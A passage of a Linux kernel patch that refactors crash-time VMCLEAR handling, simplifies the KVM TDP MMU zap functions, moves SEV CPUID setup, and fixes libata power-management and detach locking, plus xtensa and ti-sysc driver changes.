+-	cpu_crash_vmclear_loaded_vmcss();
+-
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+ 	 */
+@@ -133,11 +107,6 @@ void native_machine_crash_shutdown(struct pt_regs *regs)
+ 
+ 	crash_smp_send_stop();
+ 
+-	/*
+-	 * VMCLEAR VMCSs loaded on this cpu if needed.
+-	 */
+-	cpu_crash_vmclear_loaded_vmcss();
+-
+ 	cpu_emergency_disable_virtualization();
+ 
+ 	/*
+diff --git a/arch/x86/kernel/reboot.c b/arch/x86/kernel/reboot.c
+index d03c551defccf..299b970e5f829 100644
+--- a/arch/x86/kernel/reboot.c
++++ b/arch/x86/kernel/reboot.c
+@@ -787,6 +787,26 @@ void machine_crash_shutdown(struct pt_regs *regs)
+ }
+ #endif
+ 
++/*
++ * This is used to VMCLEAR all VMCSs loaded on the
++ * processor. And when loading kvm_intel module, the
++ * callback function pointer will be assigned.
++ *
++ * protected by rcu.
++ */
++crash_vmclear_fn __rcu *crash_vmclear_loaded_vmcss;
++EXPORT_SYMBOL_GPL(crash_vmclear_loaded_vmcss);
++
++static inline void cpu_crash_vmclear_loaded_vmcss(void)
++{
++	crash_vmclear_fn *do_vmclear_operation = NULL;
++
++	rcu_read_lock();
++	do_vmclear_operation = rcu_dereference(crash_vmclear_loaded_vmcss);
++	if (do_vmclear_operation)
++		do_vmclear_operation();
++	rcu_read_unlock();
++}
+ 
+ /* This is the CPU performing the emergency shutdown work. */
+ int crashing_cpu = -1;
+@@ -798,6 +818,8 @@ int crashing_cpu = -1;
+  */
+ void cpu_emergency_disable_virtualization(void)
+ {
++	cpu_crash_vmclear_loaded_vmcss();
++
+ 	cpu_emergency_vmxoff();
+ 	cpu_emergency_svm_disable();
+ }
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index 892609cde4a20..804a252382da7 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -363,15 +363,11 @@ static void __init add_early_ima_buffer(u64 phys_addr)
+ #if defined(CONFIG_HAVE_IMA_KEXEC) && !defined(CONFIG_OF_FLATTREE)
+ int __init ima_free_kexec_buffer(void)
+ {
+-	int rc;
+-
+ 	if (!ima_kexec_buffer_size)
+ 		return -ENOENT;
+ 
+-	rc = memblock_phys_free(ima_kexec_buffer_phys,
+-				ima_kexec_buffer_size);
+-	if (rc)
+-		return rc;
++	memblock_free_late(ima_kexec_buffer_phys,
++			   ima_kexec_buffer_size);
+ 
+ 	ima_kexec_buffer_phys = 0;
+ 	ima_kexec_buffer_size = 0;
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 7a6df4b62c1bd..2a6fec4e2d196 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -6079,7 +6079,6 @@ static bool kvm_rmap_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_e
+ void kvm_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_end)
+ {
+ 	bool flush;
+-	int i;
+ 
+ 	if (WARN_ON_ONCE(gfn_end <= gfn_start))
+ 		return;
+@@ -6090,11 +6089,8 @@ void kvm_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_end)
+ 
+ 	flush = kvm_rmap_zap_gfn_range(kvm, gfn_start, gfn_end);
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
+-		for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++)
+-			flush = kvm_tdp_mmu_zap_leafs(kvm, i, gfn_start,
+-						      gfn_end, true, flush);
+-	}
++	if (is_tdp_mmu_enabled(kvm))
++		flush = kvm_tdp_mmu_zap_leafs(kvm, gfn_start, gfn_end, flush);
+ 
+ 	if (flush)
+ 		kvm_flush_remote_tlbs_with_address(kvm, gfn_start,
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index 70945f00ec412..9b9fc4e834d09 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -222,8 +222,12 @@ static struct kvm_mmu_page *tdp_mmu_next_root(struct kvm *kvm,
+ #define for_each_valid_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared)	\
+ 	__for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, _shared, true)
+ 
+-#define for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id)			\
+-	__for_each_tdp_mmu_root_yield_safe(_kvm, _root, _as_id, false, false)
++#define for_each_tdp_mmu_root_yield_safe(_kvm, _root)			\
++	for (_root = tdp_mmu_next_root(_kvm, NULL, false, false);		\
++	     _root;								\
++	     _root = tdp_mmu_next_root(_kvm, _root, false, false))		\
++		if (!kvm_lockdep_assert_mmu_lock_held(_kvm, false)) {		\
++		} else
+ 
+ /*
+  * Iterate over all TDP MMU roots.  Requires that mmu_lock be held for write,
+@@ -955,13 +959,12 @@ static bool tdp_mmu_zap_leafs(struct kvm *kvm, struct kvm_mmu_page *root,
+  * true if a TLB flush is needed before releasing the MMU lock, i.e. if one or
+  * more SPTEs were zapped since the MMU lock was last acquired.
+  */
+-bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, int as_id, gfn_t start, gfn_t end,
+-			   bool can_yield, bool flush)
++bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, gfn_t start, gfn_t end, bool flush)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	for_each_tdp_mmu_root_yield_safe(kvm, root, as_id)
+-		flush = tdp_mmu_zap_leafs(kvm, root, start, end, can_yield, flush);
++	for_each_tdp_mmu_root_yield_safe(kvm, root)
++		flush = tdp_mmu_zap_leafs(kvm, root, start, end, true, flush);
+ 
+ 	return flush;
+ }
+@@ -969,7 +972,6 @@ bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, int as_id, gfn_t start, gfn_t end,
+ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+ {
+ 	struct kvm_mmu_page *root;
+-	int i;
+ 
+ 	/*
+ 	 * Zap all roots, including invalid roots, as all SPTEs must be dropped
+@@ -983,10 +985,8 @@ void kvm_tdp_mmu_zap_all(struct kvm *kvm)
+ 	 * is being destroyed or the userspace VMM has exited.  In both cases,
+ 	 * KVM_RUN is unreachable, i.e. no vCPUs will ever service the request.
+ 	 */
+-	for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++) {
+-		for_each_tdp_mmu_root_yield_safe(kvm, root, i)
+-			tdp_mmu_zap_root(kvm, root, false);
+-	}
++	for_each_tdp_mmu_root_yield_safe(kvm, root)
++		tdp_mmu_zap_root(kvm, root, false);
+ }
+ 
+ /*
+@@ -1221,8 +1221,13 @@ int kvm_tdp_mmu_map(struct kvm_vcpu *vcpu, struct kvm_page_fault *fault)
+ bool kvm_tdp_mmu_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range,
+ 				 bool flush)
+ {
+-	return kvm_tdp_mmu_zap_leafs(kvm, range->slot->as_id, range->start,
+-				     range->end, range->may_block, flush);
++	struct kvm_mmu_page *root;
++
++	__for_each_tdp_mmu_root_yield_safe(kvm, root, range->slot->as_id, false, false)
++		flush = tdp_mmu_zap_leafs(kvm, root, range->start, range->end,
++					  range->may_block, flush);
++
++	return flush;
+ }
+ 
+ typedef bool (*tdp_handler_t)(struct kvm *kvm, struct tdp_iter *iter,
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.h b/arch/x86/kvm/mmu/tdp_mmu.h
+index c163f7cc23ca5..d0a9fe0770fdd 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.h
++++ b/arch/x86/kvm/mmu/tdp_mmu.h
+@@ -15,8 +15,7 @@ __must_check static inline bool kvm_tdp_mmu_get_root(struct kvm_mmu_page *root)
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared);
+ 
+-bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, int as_id, gfn_t start,
+-				 gfn_t end, bool can_yield, bool flush);
++bool kvm_tdp_mmu_zap_leafs(struct kvm *kvm, gfn_t start, gfn_t end, bool flush);
+ bool kvm_tdp_mmu_zap_sp(struct kvm *kvm, struct kvm_mmu_page *sp);
+ void kvm_tdp_mmu_zap_all(struct kvm *kvm);
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm);
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index d08d5e085649f..3060fe4e9731a 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -2941,6 +2941,32 @@ int sev_es_string_io(struct vcpu_svm *svm, int size, unsigned int port, int in)
+ 				    count, in);
+ }
+ 
++static void sev_es_vcpu_after_set_cpuid(struct vcpu_svm *svm)
++{
++	struct kvm_vcpu *vcpu = &svm->vcpu;
++
++	if (boot_cpu_has(X86_FEATURE_V_TSC_AUX)) {
++		bool v_tsc_aux = guest_cpuid_has(vcpu, X86_FEATURE_RDTSCP) ||
++				 guest_cpuid_has(vcpu, X86_FEATURE_RDPID);
++
++		set_msr_interception(vcpu, svm->msrpm, MSR_TSC_AUX, v_tsc_aux, v_tsc_aux);
++	}
++}
++
++void sev_vcpu_after_set_cpuid(struct vcpu_svm *svm)
++{
++	struct kvm_vcpu *vcpu = &svm->vcpu;
++	struct kvm_cpuid_entry2 *best;
++
++	/* For sev guests, the memory encryption bit is not reserved in CR3.  */
++	best = kvm_find_cpuid_entry(vcpu, 0x8000001F);
++	if (best)
++		vcpu->arch.reserved_gpa_bits &= ~(1UL << (best->ebx & 0x3f));
++
++	if (sev_es_guest(svm->vcpu.kvm))
++		sev_es_vcpu_after_set_cpuid(svm);
++}
++
+ static void sev_es_init_vmcb(struct vcpu_svm *svm)
+ {
+ 	struct kvm_vcpu *vcpu = &svm->vcpu;
+@@ -2987,14 +3013,6 @@ static void sev_es_init_vmcb(struct vcpu_svm *svm)
+ 	set_msr_interception(vcpu, svm->msrpm, MSR_IA32_LASTBRANCHTOIP, 1, 1);
+ 	set_msr_interception(vcpu, svm->msrpm, MSR_IA32_LASTINTFROMIP, 1, 1);
+ 	set_msr_interception(vcpu, svm->msrpm, MSR_IA32_LASTINTTOIP, 1, 1);
+-
+-	if (boot_cpu_has(X86_FEATURE_V_TSC_AUX) &&
+-	    (guest_cpuid_has(&svm->vcpu, X86_FEATURE_RDTSCP) ||
+-	     guest_cpuid_has(&svm->vcpu, X86_FEATURE_RDPID))) {
+-		set_msr_interception(vcpu, svm->msrpm, MSR_TSC_AUX, 1, 1);
+-		if (guest_cpuid_has(&svm->vcpu, X86_FEATURE_RDTSCP))
+-			svm_clr_intercept(svm, INTERCEPT_RDTSCP);
+-	}
+ }
+ 
+ void sev_init_vmcb(struct vcpu_svm *svm)
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 7e4d66be18ef5..c871a6d6364ca 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -4173,7 +4173,6 @@ static bool svm_has_emulated_msr(struct kvm *kvm, u32 index)
+ static void svm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+-	struct kvm_cpuid_entry2 *best;
+ 
+ 	vcpu->arch.xsaves_enabled = guest_cpuid_has(vcpu, X86_FEATURE_XSAVE) &&
+ 				    boot_cpu_has(X86_FEATURE_XSAVE) &&
+@@ -4198,12 +4197,8 @@ static void svm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 
+ 	svm_recalc_instruction_intercepts(vcpu, svm);
+ 
+-	/* For sev guests, the memory encryption bit is not reserved in CR3.  */
+-	if (sev_guest(vcpu->kvm)) {
+-		best = kvm_find_cpuid_entry(vcpu, 0x8000001F);
+-		if (best)
+-			vcpu->arch.reserved_gpa_bits &= ~(1UL << (best->ebx & 0x3f));
+-	}
++	if (sev_guest(vcpu->kvm))
++		sev_vcpu_after_set_cpuid(svm);
+ 
+ 	init_vmcb_after_set_cpuid(vcpu);
+ }
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index 62f87492763e0..4cb1425900c6d 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -677,6 +677,7 @@ void __init sev_hardware_setup(void);
+ void sev_hardware_unsetup(void);
+ int sev_cpu_init(struct svm_cpu_data *sd);
+ void sev_init_vmcb(struct vcpu_svm *svm);
++void sev_vcpu_after_set_cpuid(struct vcpu_svm *svm);
+ void sev_free_vcpu(struct kvm_vcpu *vcpu);
+ int sev_handle_vmgexit(struct kvm_vcpu *vcpu);
+ int sev_es_string_io(struct vcpu_svm *svm, int size, unsigned int port, int in);
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 4e972b9b68e59..31a10d774df6d 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -40,7 +40,7 @@
+ #include <asm/idtentry.h>
+ #include <asm/io.h>
+ #include <asm/irq_remapping.h>
+-#include <asm/kexec.h>
++#include <asm/reboot.h>
+ #include <asm/perf_event.h>
+ #include <asm/mmu_context.h>
+ #include <asm/mshyperv.h>
+@@ -702,7 +702,6 @@ static int vmx_set_guest_uret_msr(struct vcpu_vmx *vmx,
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_KEXEC_CORE
+ static void crash_vmclear_local_loaded_vmcss(void)
+ {
+ 	int cpu = raw_smp_processor_id();
+@@ -712,7 +711,6 @@ static void crash_vmclear_local_loaded_vmcss(void)
+ 			    loaded_vmcss_on_cpu_link)
+ 		vmcs_clear(v->vmcs);
+ }
+-#endif /* CONFIG_KEXEC_CORE */
+ 
+ static void __loaded_vmcs_clear(void *arg)
+ {
+@@ -8522,10 +8520,9 @@ static void __vmx_exit(void)
+ {
+ 	allow_smaller_maxphyaddr = false;
+ 
+-#ifdef CONFIG_KEXEC_CORE
+ 	RCU_INIT_POINTER(crash_vmclear_loaded_vmcss, NULL);
+ 	synchronize_rcu();
+-#endif
++
+ 	vmx_cleanup_l1d_flush();
+ }
+ 
+@@ -8598,10 +8595,9 @@ static int __init vmx_init(void)
+ 		pi_init_cpu(cpu);
+ 	}
+ 
+-#ifdef CONFIG_KEXEC_CORE
+ 	rcu_assign_pointer(crash_vmclear_loaded_vmcss,
+ 			   crash_vmclear_local_loaded_vmcss);
+-#endif
++
+ 	vmx_check_vmcs12_offsets();
+ 
+ 	/*
+diff --git a/arch/xtensa/boot/Makefile b/arch/xtensa/boot/Makefile
+index a65b7a9ebff28..d8b0fadf429a9 100644
+--- a/arch/xtensa/boot/Makefile
++++ b/arch/xtensa/boot/Makefile
+@@ -9,8 +9,7 @@
+ 
+ 
+ # KBUILD_CFLAGS used when building rest of boot (takes effect recursively)
+-KBUILD_CFLAGS	+= -fno-builtin -Iarch/$(ARCH)/boot/include
+-HOSTFLAGS	+= -Iarch/$(ARCH)/boot/include
++KBUILD_CFLAGS	+= -fno-builtin
+ 
+ subdir-y	:= lib
+ targets		+= vmlinux.bin vmlinux.bin.gz
+diff --git a/arch/xtensa/boot/lib/zmem.c b/arch/xtensa/boot/lib/zmem.c
+index e3ecd743c5153..b89189355122a 100644
+--- a/arch/xtensa/boot/lib/zmem.c
++++ b/arch/xtensa/boot/lib/zmem.c
+@@ -4,13 +4,14 @@
+ /* bits taken from ppc */
+ 
+ extern void *avail_ram, *end_avail;
++void gunzip(void *dst, int dstlen, unsigned char *src, int *lenp);
+ 
+-void exit (void)
++static void exit(void)
+ {
+   for (;;);
+ }
+ 
+-void *zalloc(unsigned size)
++static void *zalloc(unsigned int size)
+ {
+         void *p = avail_ram;
+ 
+diff --git a/arch/xtensa/include/asm/core.h b/arch/xtensa/include/asm/core.h
+index 7cef85ad9741a..25293269e1edd 100644
+--- a/arch/xtensa/include/asm/core.h
++++ b/arch/xtensa/include/asm/core.h
+@@ -6,6 +6,10 @@
+ 
+ #include <variant/core.h>
+ 
++#ifndef XCHAL_HAVE_DIV32
++#define XCHAL_HAVE_DIV32 0
++#endif
++
+ #ifndef XCHAL_HAVE_EXCLUSIVE
+ #define XCHAL_HAVE_EXCLUSIVE 0
+ #endif
+diff --git a/arch/xtensa/lib/umulsidi3.S b/arch/xtensa/lib/umulsidi3.S
+index 1360816479427..4d9ba2387de0f 100644
+--- a/arch/xtensa/lib/umulsidi3.S
++++ b/arch/xtensa/lib/umulsidi3.S
+@@ -3,7 +3,9 @@
+ #include <asm/asmmacro.h>
+ #include <asm/core.h>
+ 
+-#if !XCHAL_HAVE_MUL16 && !XCHAL_HAVE_MUL32 && !XCHAL_HAVE_MAC16
++#if XCHAL_HAVE_MUL16 || XCHAL_HAVE_MUL32 || XCHAL_HAVE_MAC16
++#define XCHAL_NO_MUL 0
++#else
+ #define XCHAL_NO_MUL 1
+ #endif
+ 
+diff --git a/arch/xtensa/platforms/iss/network.c b/arch/xtensa/platforms/iss/network.c
+index 119345eeb04c9..bea539f9039a2 100644
+--- a/arch/xtensa/platforms/iss/network.c
++++ b/arch/xtensa/platforms/iss/network.c
+@@ -201,7 +201,7 @@ static int tuntap_write(struct iss_net_private *lp, struct sk_buff **skb)
+ 	return simc_write(lp->tp.info.tuntap.fd, (*skb)->data, (*skb)->len);
+ }
+ 
+-unsigned short tuntap_protocol(struct sk_buff *skb)
++static unsigned short tuntap_protocol(struct sk_buff *skb)
+ {
+ 	return eth_type_trans(skb, skb->dev);
+ }
+@@ -441,7 +441,7 @@ static int iss_net_change_mtu(struct net_device *dev, int new_mtu)
+ 	return -EINVAL;
+ }
+ 
+-void iss_net_user_timer_expire(struct timer_list *unused)
++static void iss_net_user_timer_expire(struct timer_list *unused)
+ {
+ }
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 0ba0c3d1613f1..25b9bdf2fc380 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -4981,17 +4981,19 @@ static void ata_port_request_pm(struct ata_port *ap, pm_message_t mesg,
+ 	struct ata_link *link;
+ 	unsigned long flags;
+ 
+-	/* Previous resume operation might still be in
+-	 * progress.  Wait for PM_PENDING to clear.
++	spin_lock_irqsave(ap->lock, flags);
++
++	/*
++	 * A previous PM operation might still be in progress. Wait for
++	 * ATA_PFLAG_PM_PENDING to clear.
+ 	 */
+ 	if (ap->pflags & ATA_PFLAG_PM_PENDING) {
++		spin_unlock_irqrestore(ap->lock, flags);
+ 		ata_port_wait_eh(ap);
+-		WARN_ON(ap->pflags & ATA_PFLAG_PM_PENDING);
++		spin_lock_irqsave(ap->lock, flags);
+ 	}
+ 
+-	/* request PM ops to EH */
+-	spin_lock_irqsave(ap->lock, flags);
+-
++	/* Request PM operation to EH */
+ 	ap->pm_mesg = mesg;
+ 	ap->pflags |= ATA_PFLAG_PM_PENDING;
+ 	ata_for_each_link(link, ap, HOST_FIRST) {
+@@ -5003,10 +5005,8 @@ static void ata_port_request_pm(struct ata_port *ap, pm_message_t mesg,
+ 
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ 
+-	if (!async) {
++	if (!async)
+ 		ata_port_wait_eh(ap);
+-		WARN_ON(ap->pflags & ATA_PFLAG_PM_PENDING);
+-	}
+ }
+ 
+ /*
+@@ -5173,7 +5173,7 @@ EXPORT_SYMBOL_GPL(ata_host_resume);
+ #endif
+ 
+ const struct device_type ata_port_type = {
+-	.name = "ata_port",
++	.name = ATA_PORT_TYPE_NAME,
+ #ifdef CONFIG_PM
+ 	.pm = &ata_port_pm_ops,
+ #endif
+@@ -5906,11 +5906,30 @@ static void ata_port_detach(struct ata_port *ap)
+ 	if (!ap->ops->error_handler)
+ 		goto skip_eh;
+ 
+-	/* tell EH we're leaving & flush EH */
++	/* Wait for any ongoing EH */
++	ata_port_wait_eh(ap);
++
++	mutex_lock(&ap->scsi_scan_mutex);
+ 	spin_lock_irqsave(ap->lock, flags);
++
++	/* Remove scsi devices */
++	ata_for_each_link(link, ap, HOST_FIRST) {
++		ata_for_each_dev(dev, link, ALL) {
++			if (dev->sdev) {
++				spin_unlock_irqrestore(ap->lock, flags);
++				scsi_remove_device(dev->sdev);
++				spin_lock_irqsave(ap->lock, flags);
++				dev->sdev = NULL;
++			}
++		}
++	}
++
++	/* Tell EH to disable all devices */
+ 	ap->pflags |= ATA_PFLAG_UNLOADING;
+ 	ata_port_schedule_eh(ap);
++
+ 	spin_unlock_irqrestore(ap->lock, flags);
++	mutex_unlock(&ap->scsi_scan_mutex);
+ 
+ 	/* wait till EH commits suicide */
+ 	ata_port_wait_eh(ap);
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index a3ae5fc2a42fc..6d4c80b6daaef 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -2704,18 +2704,11 @@ int ata_eh_reset(struct ata_link *link, int classify,
+ 		}
+ 	}
+ 
+-	/*
+-	 * Some controllers can't be frozen very well and may set spurious
+-	 * error conditions during reset.  Clear accumulated error
+-	 * information and re-thaw the port if frozen.  As reset is the
+-	 * final recovery action and we cross check link onlineness against
+-	 * device classification later, no hotplug event is lost by this.
+-	 */
++	/* clear cached SError */
+ 	spin_lock_irqsave(link->ap->lock, flags);
+-	memset(&link->eh_info, 0, sizeof(link->eh_info));
++	link->eh_info.serror = 0;
+ 	if (slave)
+-		memset(&slave->eh_info, 0, sizeof(link->eh_info));
+-	ap->pflags &= ~ATA_PFLAG_EH_PENDING;
++		slave->eh_info.serror = 0;
+ 	spin_unlock_irqrestore(link->ap->lock, flags);
+ 
+ 	if (ap->pflags & ATA_PFLAG_FROZEN)
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 9c0052d28078a..d28628b964e29 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1113,6 +1113,42 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 	return 0;
+ }
+ 
++/**
++ *	ata_scsi_slave_alloc - Early setup of SCSI device
++ *	@sdev: SCSI device to examine
++ *
++ *	This is called from scsi_alloc_sdev() when the scsi device
++ *	associated with an ATA device is scanned on a port.
++ *
++ *	LOCKING:
++ *	Defined by SCSI layer.  We don't really care.
++ */
++
++int ata_scsi_slave_alloc(struct scsi_device *sdev)
++{
++	struct ata_port *ap = ata_shost_to_port(sdev->host);
++	struct device_link *link;
++
++	ata_scsi_sdev_config(sdev);
++
++	/*
++	 * Create a link from the ata_port device to the scsi device to ensure
++	 * that PM does suspend/resume in the correct order: the scsi device is
++	 * consumer (child) and the ata port the supplier (parent).
++	 */
++	link = device_link_add(&sdev->sdev_gendev, &ap->tdev,
++			       DL_FLAG_STATELESS |
++			       DL_FLAG_PM_RUNTIME | DL_FLAG_RPM_ACTIVE);
++	if (!link) {
++		ata_port_err(ap, "Failed to create link to scsi device %s\n",
++			     dev_name(&sdev->sdev_gendev));
++		return -ENODEV;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(ata_scsi_slave_alloc);
++
+ /**
+  *	ata_scsi_slave_config - Set SCSI device attributes
+  *	@sdev: SCSI device to examine
+@@ -1129,14 +1165,11 @@ int ata_scsi_slave_config(struct scsi_device *sdev)
+ {
+ 	struct ata_port *ap = ata_shost_to_port(sdev->host);
+ 	struct ata_device *dev = __ata_scsi_find_dev(ap, sdev);
+-	int rc = 0;
+-
+-	ata_scsi_sdev_config(sdev);
+ 
+ 	if (dev)
+-		rc = ata_scsi_dev_config(sdev, dev);
++		return ata_scsi_dev_config(sdev, dev);
+ 
+-	return rc;
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(ata_scsi_slave_config);
+ 
+@@ -1163,6 +1196,8 @@ void ata_scsi_slave_destroy(struct scsi_device *sdev)
+ 	if (!ap->ops->error_handler)
+ 		return;
+ 
++	device_link_remove(&sdev->sdev_gendev, &ap->tdev);
++
+ 	spin_lock_irqsave(ap->lock, flags);
+ 	dev = __ata_scsi_find_dev(ap, sdev);
+ 	if (dev && dev->sdev) {
+@@ -4192,7 +4227,7 @@ void ata_scsi_simulate(struct ata_device *dev, struct scsi_cmnd *cmd)
+ 		break;
+ 
+ 	case MAINTENANCE_IN:
+-		if (scsicmd[1] == MI_REPORT_SUPPORTED_OPERATION_CODES)
++		if ((scsicmd[1] & 0x1f) == MI_REPORT_SUPPORTED_OPERATION_CODES)
+ 			ata_scsi_rbuf_fill(&args, ata_scsiop_maint_in);
+ 		else
+ 			ata_scsi_set_invalid_field(dev, cmd, 1, 0xff);
+diff --git a/drivers/ata/libata-transport.c b/drivers/ata/libata-transport.c
+index e4fb9d1b9b398..3e49a877500e1 100644
+--- a/drivers/ata/libata-transport.c
++++ b/drivers/ata/libata-transport.c
+@@ -266,6 +266,10 @@ void ata_tport_delete(struct ata_port *ap)
+ 	put_device(dev);
+ }
+ 
++static const struct device_type ata_port_sas_type = {
++	.name = ATA_PORT_TYPE_NAME,
++};
++
+ /** ata_tport_add - initialize a transport ATA port structure
+  *
+  * @parent:	parent device
+@@ -283,7 +287,10 @@ int ata_tport_add(struct device *parent,
+ 	struct device *dev = &ap->tdev;
+ 
+ 	device_initialize(dev);
+-	dev->type = &ata_port_type;
++	if (ap->flags & ATA_FLAG_SAS_HOST)
++		dev->type = &ata_port_sas_type;
++	else
++		dev->type = &ata_port_type;
+ 
+ 	dev->parent = parent;
+ 	ata_host_get(ap->host);
+diff --git a/drivers/ata/libata.h b/drivers/ata/libata.h
+index 2c5c8273af017..e5ec197aed303 100644
+--- a/drivers/ata/libata.h
++++ b/drivers/ata/libata.h
+@@ -30,6 +30,8 @@ enum {
+ 	ATA_DNXFER_QUIET	= (1 << 31),
+ };
+ 
++#define ATA_PORT_TYPE_NAME	"ata_port"
++
+ extern atomic_t ata_print_id;
+ extern int atapi_passthru16;
+ extern int libata_fua;
+diff --git a/drivers/ata/sata_mv.c b/drivers/ata/sata_mv.c
+index e3cff01201b80..17f9062b0eaa5 100644
+--- a/drivers/ata/sata_mv.c
++++ b/drivers/ata/sata_mv.c
+@@ -1255,8 +1255,8 @@ static void mv_dump_mem(struct device *dev, void __iomem *start, unsigned bytes)
+ 
+ 	for (b = 0; b < bytes; ) {
+ 		for (w = 0, o = 0; b < bytes && w < 4; w++) {
+-			o += snprintf(linebuf + o, sizeof(linebuf) - o,
+-				      "%08x ", readl(start + b));
++			o += scnprintf(linebuf + o, sizeof(linebuf) - o,
++				       "%08x ", readl(start + b));
+ 			b += sizeof(u32);
+ 		}
+ 		dev_dbg(dev, "%s: %p: %s\n",
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index ddde1427c90c7..59a2fe2448f17 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -38,6 +38,7 @@ enum sysc_soc {
+ 	SOC_2420,
+ 	SOC_2430,
+ 	SOC_3430,
++	SOC_AM35,
+ 	SOC_3630,
+ 	SOC_4430,
+ 	SOC_4460,
+@@ -1119,6 +1120,11 @@ static int sysc_enable_module(struct device *dev)
+ 	if (ddata->cfg.quirks & (SYSC_QUIRK_SWSUP_SIDLE |
+ 				 SYSC_QUIRK_SWSUP_SIDLE_ACT)) {
+ 		best_mode = SYSC_IDLE_NO;
++
++		/* Clear WAKEUP */
++		if (regbits->enwkup_shift >= 0 &&
++		    ddata->cfg.sysc_val & BIT(regbits->enwkup_shift))
++			reg &= ~BIT(regbits->enwkup_shift);
+ 	} else {
+ 		best_mode = fls(ddata->cfg.sidlemodes) - 1;
+ 		if (best_mode > SYSC_IDLE_MASK) {
+@@ -1246,6 +1252,13 @@ set_sidle:
+ 		}
+ 	}
+ 
++	if (ddata->cfg.quirks & SYSC_QUIRK_SWSUP_SIDLE_ACT) {
++		/* Set WAKEUP */
++		if (regbits->enwkup_shift >= 0 &&
++		    ddata->cfg.sysc_val & BIT(regbits->enwkup_shift))
++			reg |= BIT(regbits->enwkup_shift);
++	}
++
+ 	reg &= ~(SYSC_IDLE_MASK << regbits->sidle_shift);
+ 	reg |= best_mode << regbits->sidle_shift;
+ 	if (regbits->autoidle_shift >= 0 &&
+@@ -1540,16 +1553,16 @@ struct sysc_revision_quirk {
+ static const struct sysc_revision_quirk sysc_revision_quirks[] = {
+ 	/* These drivers need to be fixed to not use pm_runtime_irq_safe() */
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x00000046, 0xffffffff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x00000052, 0xffffffff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	/* Uarts on omap4 and later */
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x50411e03, 0xffff00ff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47422e03, 0xffffffff,
